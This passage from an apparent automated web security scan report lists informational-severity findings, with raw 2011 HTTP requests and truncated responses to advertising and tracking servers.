Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1009

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://bs.serving-sys.com/BurstingPipe/adServer.b
...[SNIP]...

32.17. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:46|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=8%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=8%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=$CTURL$&r=0.41022151810352664 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BBBAAsJvBBVBF4FR; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=D59D0400-34A2-18F5-1309-720000200101; PRca=|AKEA*263:1|#; PRcp=|AKEAAAEP:1|#; PRpl=|FFCo:1|#; PRcr=|GEHc:1|#; PRpc=|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2479
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-B4D5-95AF-1209-8C0000530202; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:1|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:1|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQud:1|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiO:1|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQudGKiO:1|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

32.18. http://api.tweetmeme.com/url_info.jsonc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Request

GET /url_info.jsonc?url=http%3A%2F%2Fwww.infusionblog.com%2F&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_unique_ident=4db0cb914d8999.97267012-57c11f7a933564d3f62b1bb71b01e19d

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 399
X-Url-Lookup: OrAdd (119)
X-Served-By: ded2059
Content-Length: 407

aptureJsonCallback1({"status":"success","story":{"title":"Infusionsoft Blog","url":"http:\/\/www.infusionblog.com\/","media_type":"news","created_at":"2009-03-05 22:58:12","url_count":"27","tm_link":"
...[SNIP]...

32.19. http://ar.voicefive.com/bmx3/iframe.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/iframe.htm

Request

GET /bmx3/iframe.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=728leader;tile=1;sz=728x90;ord=02880823?;c=win7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:54:13 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Length: 519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head></head>
<body>
<script>
   var qs = window.location.search.substring(1);
   var pid = "";
if (/pi
...[SNIP]...

32.20. http://ar.voicefive.com/bmx3/projects/p81479006/invite/mtg_invite.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/projects/p81479006/invite/mtg_invite.htm

Request

GET /bmx3/projects/p81479006/invite/mtg_invite.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ar.voicefive.com/bmx3/iframe.htm?&recruitFrequency=1&pid=p81479006&prad=58779362&ar_c=40314462&methodology=3&inv=mtg_popup&grp=1&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fpcw.main.news%2Ftopics%2Fconsumer_advice%2Farticle%3Bpg%3Darticle%3Baid%3D149142%3Bc%3D2206%3Bc%3D1746%3Bc%3D2210%3Bpos%3D728leader%3Btile%3D1%3Bsz%3D728x90%3Bord%3D02880823%3F%3Bc%3Dwin7&referrer=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html&path=http%3A%2F%2Far.voicefive.com%2Fbmx3%2F&branding=pcworld&version=3.0&site=500&delay=10000&dom=27&inv_type=7&site=500&1303674292541
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; BMX_G=method->-1,ts->1303674270; BMX_3PC=1; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:54:53 GMT
Content-Type: text/html
Connection: close
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Length: 2144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<html>
<head>
<title>Voi
...[SNIP]...

32.21. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658438@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:23:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 534
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/;httponly

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="PizzaHut=ZapTrader;expires="+B3d.toGMTString()+
...[SNIP]...

32.22. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658455@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:25:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 535
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="PizzaHut=ZapTrader;expires="+B3d.toGMTString()+
...[SNIP]...

32.23. http://b3.mookie1.com/2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90

Request

GET /2/ZapTrader/PizzaHut_2H/201008/18-49/All/11303658466@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtwWDCnkP1am4XiC_5n1P5ao4AdRrg%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; other_20110126=set; Dominos=247B3; id=914804995789526; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660; PizzaHut=ZapTrader

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:26:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 534
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="PizzaHut=ZapTrader;expires="+B3d.toGMTString()+
...[SNIP]...

32.24. http://brandbuzz.hillandknowlton.com/display/js/functions_global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brandbuzz.hillandknowlton.com
Path:   /display/js/functions_global.js

Request

GET /display/js/functions_global.js HTTP/1.1
Host: brandbuzz.hillandknowlton.com
Proxy-Connection: keep-alive
Referer: http://www2.hillandknowlton.com/crw/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 00:34:35 GMT
Connection: close
Content-Type: text/html
Content-Length: 111

<html><head><title>Site Not Found</title></head>
<body>No web site is configured at this address.</body></html>

32.25. http://breathe.c3metrics.com/c3realview.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://breathe.c3metrics.com
Path:   /c3realview.js

Request

GET /c3realview.js HTTP/1.1
Host: breathe.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: Apache
P3P: CP="NON DSP CURa ADMo DEVo PSAo PSDo IVAo IVDo OUR SAMo BUS UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Connection: close
Content-Type: text/html
Content-Length: 9583

(function(){c3CTJS={c3CTVersion:{vNo:'5.1.0'},c3CJS:{c3CJScampignId:'480',c3CJSdomain:null,c3VJSuid:'13014572191303613803',c3VJSnuid:'',c3CJSnetwork:'1',c3CJSOrganic:1,c3CJSOrganicQ:2,c3CJSlenSet:2,c3
...[SNIP]...

32.26. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=44536&rnd=288817.4828887202 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=2cd7097f-7369-4ae1-ac1c-c726ae580b4d3HM0b0; expires=Sat, 23-Jul-2011 20:35:44 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 25 Apr 2011 00:35:43 GMT
Connection: close
Content-Length: 3916

var part0 = '';
part0 += "<"+"!-- Do Not Remove - Turn Tracking Beacon Code - Do Not Remove -->\n";
part0 += "<"+"!-- Advertiser Name : MYFICO -->\n";
part0 += "<"+"!-- Beacon Name : MYFICO - RETARGE
...[SNIP]...

32.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2099675&PluID=0&w=160&h=600&ord=7481875708042352330&ucm=true&ncu=http://r.turn.com/r/tpclick/id/yhZ911D21GdsBwUAAwIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBHhYPCky0Tba3G8ntlQfWrtDhAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtwpBMlqXzWHH4VX4kgZ93lH-yM4vQ%26client%3Dca-pub-6888065668292638%26adurl%3D/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
